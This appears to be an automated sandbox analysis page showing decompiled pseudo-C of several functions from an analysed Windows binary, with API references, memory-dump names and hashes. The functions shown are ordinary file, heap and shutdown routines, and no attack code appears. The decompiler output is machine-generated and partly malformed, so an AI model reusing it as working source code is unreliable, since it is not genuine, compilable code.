0x00e699b4

APIs

CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00E6A07C,?,?,00E67936), ref: 00E69946
CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00E6A07C,?,?,00E67936), ref: 00E6997B

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c178808239163aa96d9622fe66c7c1014d8433d46629e65ff1879488e246808b
Instruction ID: be91161e905d84a60ac7d87f13d11ab563db1def81f61e624e0ca260ce0650d1
Opcode Fuzzy Hash: c178808239163aa96d9622fe66c7c1014d8433d46629e65ff1879488e246808b
Instruction Fuzzy Hash: 7F21F671044748AED7308F64DC45BA7B7ECEB897A8F004A2DF5E5A3192C374AC499B61

Uniqueness

Uniqueness Score: -1.00%

Function 00E69F02 Relevance: 3.1, APIs: 2, Instructions: 82
timeCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00E69F02(void* __ecx, void* __esi, signed int _a4, signed int* _a8, signed int* _a12) {
				void* _v8;
				void* _v16;
				void* _v24;
				signed char _v25;
				signed char _v26;
				int _t34;
				signed char _t49;
				signed int* _t51;
				signed char _t57;
				void* _t58;
				void* _t59;
				signed int* _t60;
				signed int* _t62;

				_t59 = __esi;
				_t58 = __ecx;
				if( *(__ecx + 0x1c) != 0x100 && ( *(__ecx + 0x1c) & 0x00000002) == 0) {
					FlushFileBuffers( *(__ecx + 4));
				}
				_t51 = _a4;
				_t49 = 1;
				if(_t51 == 0 || ( *_t51 | _t51[1]) == 0) {
					_t57 = 0;
				} else {
					_t57 = 1;
				}
				_push(_t59);
				_t60 = _a8;
				_v25 = _t57;
				if(_t60 == 0) {
					L9:
					_v26 = 0;
				} else {
					_v26 = _t49;
					if(( *_t60 | _t60[1]) == 0) {
						goto L9;
					}
				}
				_t62 = _a12;
				if(_t62 == 0 || ( *_t62 | _a4) == 0) {
					_t49 = 0;
				}
				if(_t57 != 0) {
					E00E70EAD(_t51, _t57,  &_v24);
				}
				if(_v26 != 0) {
					E00E70EAD(_t60, _t57,  &_v8);
				}
				if(_t49 != 0) {
					E00E70EAD(_t62, _t57,  &_v16);
				}
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				_t34 = SetFileTime( *(_t58 + 4),  ~(_v26 & 0x000000ff) &  &_v8,  ~(_t49 & 0x000000ff) &  &_v16,  ~(_v25 & 0x000000ff) &  &_v24); // executed
				return _t34;
			}

0x00e69f02
0x00e69f08
0x00e69f11
0x00e69f1c
0x00e69f1c
0x00e69f22
0x00e69f28
0x00e69f2b
0x00e69f38
0x00e69f34
0x00e69f34
0x00e69f34
0x00e69f3a
0x00e69f3b
0x00e69f3f
0x00e69f45
0x00e69f52
0x00e69f52
0x00e69f47
0x00e69f4c
0x00e69f50
0x00000000
0x00000000
0x00e69f50
0x00e69f57
0x00e69f5d
0x00e69f67
0x00e69f67
0x00e69f6b
0x00e69f72
0x00e69f72
0x00e69f7c
0x00e69f85
0x00e69f85
0x00e69f8d
0x00e69f96
0x00e69f96
0x00e69fa6
0x00e69fb4
0x00e69fc4
0x00e69fcc
0x00e69fd8

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00E675F1,?,?,?,?), ref: 00E69F1C
SetFileTime.KERNELBASE(?,?,?,?), ref: 00E69FCC

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 7b3bbb80f4a1e3907883e5725f77b7661ec3f0dacca07a247a9da684b8596ac8
Instruction ID: 70dc6fb642380cb173a89ceb5dd0d1d361d5e8e3c962c900541d3cfe349ebb6d
Opcode Fuzzy Hash: 7b3bbb80f4a1e3907883e5725f77b7661ec3f0dacca07a247a9da684b8596ac8
Instruction Fuzzy Hash: 0421E131298246AFC714CF25D841ABBBBE8AF95348F05581DB4D5E7182C339EA0DCBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E69CF9 Relevance: 3.1, APIs: 2, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00E69CF9(void* __esi) {
				long _t14;
				void* _t17;
				long _t21;
				intOrPtr* _t23;
				long _t24;
				void* _t28;
				long _t30;
				void* _t32;
				intOrPtr* _t35;
				void* _t36;
				long _t38;

				_t32 = __esi;
				_t35 = _t23;
				if( *(_t35 + 4) == 0xffffffff) {
					L13:
					return 1;
				}
				_t21 =  *(_t36 + 0x14);
				_t30 =  *(_t36 + 0x14);
				_t38 = _t21;
				if(_t38 > 0 || _t38 >= 0 && _t30 >= 0) {
					_t24 =  *(_t36 + 0x1c);
				} else {
					_t24 =  *(_t36 + 0x1c);
					if(_t24 != 0) {
						if(_t24 != 1) {
							_t17 = E00E69A85(_t28);
						} else {
							 *0xe93260(_t32);
							_t17 =  *((intOrPtr*)( *((intOrPtr*)( *_t35 + 0x14))))();
						}
						_t30 = _t30 + _t17;
						asm("adc ebx, edx");
						_t24 = 0;
					}
				}
				 *(_t36 + 0xc) = _t21;
				_t14 = SetFilePointer( *(_t35 + 4), _t30, _t36 + 0x10, _t24); // executed
				if(_t14 != 0xffffffff || GetLastError() == 0) {
					goto L13;
				} else {
					return 0;
				}
			}

0x00e69cf9
0x00e69cfb
0x00e69d01
0x00e69d7b
0x00000000
0x00e69d7b
0x00e69d04
0x00e69d09
0x00e69d0d
0x00e69d0f
0x00e69d49
0x00e69d17
0x00e69d17
0x00e69d1d
0x00e69d22
0x00e69d3c
0x00e69d24
0x00e69d2d
0x00e69d35
0x00e69d37
0x00e69d41
0x00e69d43
0x00e69d45
0x00e69d45
0x00e69d1d
0x00e69d4f
0x00e69d60
0x00e69d6b
0x00000000
0x00e69d77
0x00000000
0x00e69d77

APIs

SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00E69CD5,?,?,00000000,?,?,00E68F2A,?), ref: 00E69D60
GetLastError.KERNEL32 ref: 00E69D6D

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 78bf2357bfcb228a5bd5eafbadca7c635431c0e759ed49d5071cca5264fbebe7
Instruction ID: ed5142d9eb7352e3b123990106de5a99f69cd8a863858bc4cdc06b2457560e0d
Opcode Fuzzy Hash: 78bf2357bfcb228a5bd5eafbadca7c635431c0e759ed49d5071cca5264fbebe7
Instruction Fuzzy Hash: 0E0108313442019F8B08CF66A8845BEB79DAF81B61B10553FF823AB292CB30DC058621

Uniqueness

Uniqueness Score: -1.00%

Function 00E69FE0 Relevance: 3.1, APIs: 2, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00E69FE0() {
				long _v4;
				void* __ecx;
				void* __ebp;
				long _t12;
				signed int _t14;
				signed int _t21;
				signed int _t22;
				void* _t23;
				long _t32;
				void* _t34;

				_t34 = _t23;
				_t22 = _t21 | 0xffffffff;
				if( *(_t34 + 4) != _t22) {
					L3:
					_v4 = _v4 & 0x00000000;
					_t12 = SetFilePointer( *(_t34 + 4), 0,  &_v4, 1); // executed
					_t32 = _t12;
					if(_t32 != _t22 || GetLastError() == 0) {
						L7:
						asm("cdq");
						_t14 = 0 + _t32;
						asm("adc edx, 0x0");
						goto L8;
					} else {
						if( *((char*)(_t34 + 0x1a)) == 0) {
							_t14 = _t22;
							L8:
							return _t14;
						}
						E00E66F92(0xea0f50, 0xea0f50, _t34 + 0x24);
						goto L7;
					}
				}
				if( *((char*)(_t34 + 0x1a)) == 0) {
					return _t22;
				}
				E00E66F92(0xea0f50, 0xea0f50, _t34 + 0x24);
				goto L3;
			}

0x00e69fe4
0x00e69fe6
0x00e69ff1
0x00e6a004
0x00e6a004
0x00e6a016
0x00e6a01c
0x00e6a020
0x00e6a03d
0x00e6a043
0x00e6a048
0x00e6a04a
0x00000000
0x00e6a02c
0x00e6a030
0x00e6a059
0x00e6a04d
0x00000000
0x00e6a04d
0x00e6a038
0x00000000
0x00e6a038
0x00e6a020
0x00e69ff7
0x00000000
0x00e6a055
0x00e69fff
0x00000000

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00E6A016
GetLastError.KERNEL32 ref: 00E6A022

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 3bab00590f356b8f992dc679fb1627bfbca7afd27911dce55370ac34174c0a43
Instruction ID: 59556c73ec48bc9df80a6b7037a58b2b9db9fd341784c448b8601fa1a81f8c81
Opcode Fuzzy Hash: 3bab00590f356b8f992dc679fb1627bfbca7afd27911dce55370ac34174c0a43
Instruction Fuzzy Hash: 9501B571B442005FD7749E29EC44767B7DAAB85399F18893EF146E3680DA75EC0C8A12

Uniqueness

Uniqueness Score: -1.00%

Function 00E67D8E Relevance: 3.0, APIs: 2, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00E67D8E(signed int* __ecx, void* __edx, void* __eflags) {
				void* __esi;
				intOrPtr _t23;
				signed int _t24;
				signed int* _t28;
				signed int* _t30;
				void* _t36;
				signed int _t38;
				signed int* _t41;
				void* _t43;
				void* _t46;

				_t46 = __eflags;
				_t36 = __edx;
				_t30 = __ecx;
				E00E7E554(E00E920EF, _t43);
				_push(_t30);
				_push(_t30);
				_t41 = _t30;
				 *(_t43 - 0x10) = _t41;
				 *_t41 =  *_t41 & 0x00000000;
				_t28 =  &(_t41[4]);
				_t41[1] = _t41[1] & 0x00000000;
				E00E6CA2B(_t28, _t36, _t46);
				_t38 =  *(_t43 + 8);
				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
				_t41[2] = _t38;
				_t41[0x3d] = 0;
				_t41[0x43e] = 0;
				_t41[0x39] = _t41[0x39] & 0;
				_t23 = E00E7E512(_t36, _t41, _t46, 0xe6e0); // executed
				 *((intOrPtr*)(_t43 - 0x14)) = _t23;
				 *(_t43 - 4) = 1;
				_t47 = _t23;
				if(_t23 == 0) {
					_t24 = 0;
					__eflags = 0;
				} else {
					_push(_t28);
					_t24 = E00E71B92(_t23, _t47);
				}
				_t41[0x38] = _t24;
				_push( *((intOrPtr*)(_t38 + 0x82e0)));
				 *(_t43 - 4) = 0;
				E00E7464C(_t24, _t36);
				 *[fs:0x0] =  *((intOrPtr*)(_t43 - 0xc));
				return _t41;
			}

0x00e67d8e
0x00e67d8e
0x00e67d8e
0x00e67d93
0x00e67d98
0x00e67d99
0x00e67d9c
0x00e67d9e
0x00e67da2
0x00e67da5
0x00e67da8
0x00e67dae
0x00e67db3
0x00e67db8
0x00e67dbc
0x00e67dbf
0x00e67dc6
0x00e67dcd
0x00e67dd8
0x00e67dde
0x00e67de1
0x00e67de5
0x00e67de7
0x00e67df3
0x00e67df3
0x00e67de9
0x00e67de9
0x00e67dec
0x00e67dec
0x00e67df5
0x00e67dfd
0x00e67e03
0x00e67e07
0x00e67e14
0x00e67e1e

APIs

__EH_prolog.LIBCMT ref: 00E67D93

Part of subcall function 00E6CA2B: __EH_prolog.LIBCMT ref: 00E6CA30
Part of subcall function 00E6CA2B: new.LIBCMT ref: 00E6CA73
Part of subcall function 00E6CA2B: new.LIBCMT ref: 00E6CA97

new.LIBCMT ref: 00E67DD8

Part of subcall function 00E71B92: __EH_prolog.LIBCMT ref: 00E71B97

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: be83ae45b83207b91a674c08f8b29186eacd75f663ef5cdc85f1d7f1bf7c0f6d
Instruction ID: 79bb5a078a294fe0b232356858cbe6758d026473f55716c9af58a0c5897bc5da
Opcode Fuzzy Hash: be83ae45b83207b91a674c08f8b29186eacd75f663ef5cdc85f1d7f1bf7c0f6d
Instruction Fuzzy Hash: 6811A971A147459BDB20DFB8E8017AAF7E4EF08359F10986EE49AE3240EBB45A008761

Uniqueness

Uniqueness Score: -1.00%

Function 00E88926 Relevance: 3.0, APIs: 2, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E00E88926(void* __ecx, void* __edx, void* _a4, long _a8) {
				void* __esi;
				void* _t4;
				long _t7;
				void* _t9;
				void* _t13;
				void* _t14;
				long _t16;

				_t13 = __edx;
				_t10 = __ecx;
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 = _a8;
					__eflags = _t16;
					if(_t16 != 0) {
						__eflags = _t16 - 0xffffffe0;
						if(_t16 <= 0xffffffe0) {
							while(1) {
								_t4 = RtlReAllocateHeap( *0xec16ec, 0, _t14, _t16); // executed
								__eflags = _t4;
								if(_t4 != 0) {
									break;
								}
								__eflags = E00E886B4();
								if(__eflags == 0) {
									goto L5;
								}
								_t7 = E00E8749D(_t10, _t13, _t16, __eflags, _t16);
								_pop(_t10);
								__eflags = _t7;
								if(_t7 == 0) {
									goto L5;
								}
							}
							L7:
							return _t4;
						}
						L5:
						 *((intOrPtr*)(E00E88C7A())) = 0xc;
						L6:
						_t4 = 0;
						__eflags = 0;
						goto L7;
					}
					E00E887FE(_t14);
					goto L6;
				}
				_t9 = E00E88838(__ecx, _a8); // executed
				return _t9;
			}

0x00e88926
0x00e88926
0x00e8892c
0x00e88931
0x00e8893f
0x00e88942
0x00e88944
0x00e8894f
0x00e88952
0x00e88979
0x00e88983
0x00e88989
0x00e8898b
0x00000000
0x00000000
0x00e8896a
0x00e8896c
0x00000000
0x00000000
0x00e8896f
0x00e88974
0x00e88975
0x00e88977
0x00000000
0x00000000
0x00e88977
0x00e88961
0x00000000
0x00e88961
0x00e88954
0x00e88959
0x00e8895f
0x00e8895f
0x00e8895f
0x00000000
0x00e8895f
0x00e88947
0x00000000
0x00e8894c
0x00e88936
0x00000000

APIs

_free.LIBCMT ref: 00E88947

Part of subcall function 00E88838: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E83CF6,?,0000015D,?,?,?,?,00E851D2,000000FF,00000000,?,?), ref: 00E8886A

RtlReAllocateHeap.NTDLL(00000000,?,?,?,?,00EA0F50,00E6D11F,?,?,?,?,?,?), ref: 00E88983

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AllocateHeap$_free
String ID:
API String ID: 1482568997-0
Opcode ID: feda117b2ce06ddfb5f93b8720d51a04fa471031e991bf1ec52011ef60682c96
Instruction ID: c175d18392724c726ccc3b2c1237f842acb00a70a371903624e35de6595f7f68
Opcode Fuzzy Hash: feda117b2ce06ddfb5f93b8720d51a04fa471031e991bf1ec52011ef60682c96
Instruction Fuzzy Hash: 05F06821145115BADB213A669F00F7A37589FD1778BA46116FC5CB61A1DE20DC005762

Uniqueness

Uniqueness Score: -1.00%

Function 00E70BE3 Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E70BE3(void* __ecx) {
				long _v8;
				long _v12;
				int _t8;
				void* _t14;
				signed int _t15;
				signed int _t17;

				_t8 = GetProcessAffinityMask(GetCurrentProcess(),  &_v8,  &_v12); // executed
				if(_t8 == 0) {
					return _t8 + 1;
				}
				_t14 = 0;
				_t17 = _v8;
				_t15 = 1;
				do {
					if((_t17 & _t15) != 0) {
						_t14 = _t14 + 1;
					}
					_t15 = _t15 + _t15;
				} while (_t15 != 0);
				if(_t14 >= 1) {
					return _t14;
				}
				return 1;
			}

0x00e70bf7
0x00e70bff
0x00000000
0x00e70c01
0x00e70c06
0x00e70c0a
0x00e70c0d
0x00e70c0f
0x00e70c11
0x00e70c13
0x00e70c13
0x00e70c14
0x00e70c14
0x00e70c1b
0x00000000
0x00e70c1d
0x00e70c22

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 00E70BF0
GetProcessAffinityMask.KERNEL32 ref: 00E70BF7

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: e0527a4357c4bdfed092470f55d88cb1c116bbf12c57280fe6ef09531f3e489e
Instruction ID: 1478bf92a15b60e5ec6a1eedc64ff95bbbaa05a7244dea659b60a8f4572ad76b
Opcode Fuzzy Hash: e0527a4357c4bdfed092470f55d88cb1c116bbf12c57280fe6ef09531f3e489e
Instruction Fuzzy Hash: C5E09BB6A00109EB4F0587B59C454EBB39DD704304710A27AEA0BF7600F930DE464660

Uniqueness

Uniqueness Score: -1.00%

Function 00E6A637 Relevance: 3.0, APIs: 2, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00E6A637(WCHAR* _a4, long _a8) {
				short _v4100;
				int _t12;
				signed int _t18;
				signed int _t19;

				E00E7E630();
				_push(_t18);
				_t12 = SetFileAttributesW(_a4, _a8); // executed
				_t19 = _t18 & 0xffffff00 | _t12 != 0x00000000;
				if(_t19 == 0 && E00E6B85C(_a4,  &_v4100, 0x800) != 0) {
					_t19 = _t19 & 0xffffff00 | SetFileAttributesW( &_v4100, _a8) != 0x00000000;
				}
				return _t19;
			}

0x00e6a63f
0x00e6a644
0x00e6a64b
0x00e6a653
0x00e6a658
0x00e6a684
0x00e6a684
0x00e6a68d

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00E6A46D,?,?,?,00E6A2B3,?,00000001,00000000,?,?), ref: 00E6A64B
SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00E6A46D,?,?,?,00E6A2B3,?,00000001,00000000,?,?), ref: 00E6A67C

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: bc8bf9764eea2fcab6031b64078f487d2c866c2a6f47140956cf571a5665b859
Instruction ID: 654fef3a7de87ac7ffe7fa9456f1cd8719b7fa10530ff1d709260018ffbede8b
Opcode Fuzzy Hash: bc8bf9764eea2fcab6031b64078f487d2c866c2a6f47140956cf571a5665b859
Instruction Fuzzy Hash: BBF0A0312901497BDF016F61EC01BEE37ACAB04385F088162FC88A6161DB328E98AE60

Uniqueness

Uniqueness Score: -1.00%

Function 00E7D830 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00E7D85E
SetDlgItemTextW.USER32(00000065,?), ref: 00E7D875

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: ItemText_swprintf
String ID:
API String ID: 3011073432-0
Opcode ID: 8bdb0731e5963c688f5a84c81aacf8f72f0a7fd9212af2c3eeae44962596a03b
Instruction ID: 1c9a8d07438d2025408c8377a5edf0c4b1fcd221abe660a616135bdadd4261a3
Opcode Fuzzy Hash: 8bdb0731e5963c688f5a84c81aacf8f72f0a7fd9212af2c3eeae44962596a03b
Instruction Fuzzy Hash: FAF0EC7194434C6EE715BFB1AC06FDF3BACAB08345F0404A5B6057B1A3D97169254762

Uniqueness

Uniqueness Score: -1.00%

Function 00E6A320 Relevance: 3.0, APIs: 2, Instructions: 28
fileCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00E6A320(WCHAR* _a4) {
				short _v4100;
				int _t10;
				signed int _t16;
				signed int _t17;

				E00E7E630();
				_push(_t16);
				_t10 = DeleteFileW(_a4); // executed
				_t17 = _t16 & 0xffffff00 | _t10 != 0x00000000;
				if(_t17 == 0 && E00E6B85C(_a4,  &_v4100, 0x800) != 0) {
					_t17 = _t17 & 0xffffff00 | DeleteFileW( &_v4100) != 0x00000000;
				}
				return _t17;
			}

0x00e6a328
0x00e6a32d
0x00e6a331
0x00e6a339
0x00e6a33e
0x00e6a367
0x00e6a367
0x00e6a370

APIs

DeleteFileW.KERNELBASE(?,?,?,00E699EC,?,?,00E69825,?,?,?,?,00E91F81,000000FF), ref: 00E6A331
DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00E699EC,?,?,00E69825,?,?,?,?,00E91F81,000000FF), ref: 00E6A35F

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 5d9ab50c063d06e76035f6403ba409e8207f53c76bd4db11742d42993a270949
Instruction ID: e24a37e1284ac91df2e687c5304dd282ad82c3760bef5a2c8fe8f6f5937ec791
Opcode Fuzzy Hash: 5d9ab50c063d06e76035f6403ba409e8207f53c76bd4db11742d42993a270949
Instruction Fuzzy Hash: 25E092319C02186BDB10AF61EC41FE977ACBB183C2F485066FC88F3151DB219DD8AE91

Uniqueness

Uniqueness Score: -1.00%

Function 00E7A62E Relevance: 3.0, APIs: 2, Instructions: 27
comCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00E7A62E(void* __ecx) {
				intOrPtr _v16;
				intOrPtr* _t5;
				void* _t8;
				void* _t13;
				void* _t16;
				intOrPtr _t19;

				 *[fs:0x0] = _t19;
				_t5 =  *0xea8430; // 0x768ac100
				 *0xe93260(_t5, _t13, _t16,  *[fs:0x0], E00E91F81, 0xffffffff);
				 *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))();
				L00E7E50C(); // executed
				_t8 =  *0xec2174( *((intOrPtr*)(__ecx + 4))); // executed
				 *[fs:0x0] = _v16;
				return _t8;
			}

0x00e7a63f
0x00e7a646
0x00e7a657
0x00e7a65d
0x00e7a662
0x00e7a667
0x00e7a671
0x00e7a67c

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00E91F81,000000FF), ref: 00E7A662
OleUninitialize.OLE32(?,?,?,?,00E91F81,000000FF), ref: 00E7A667

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
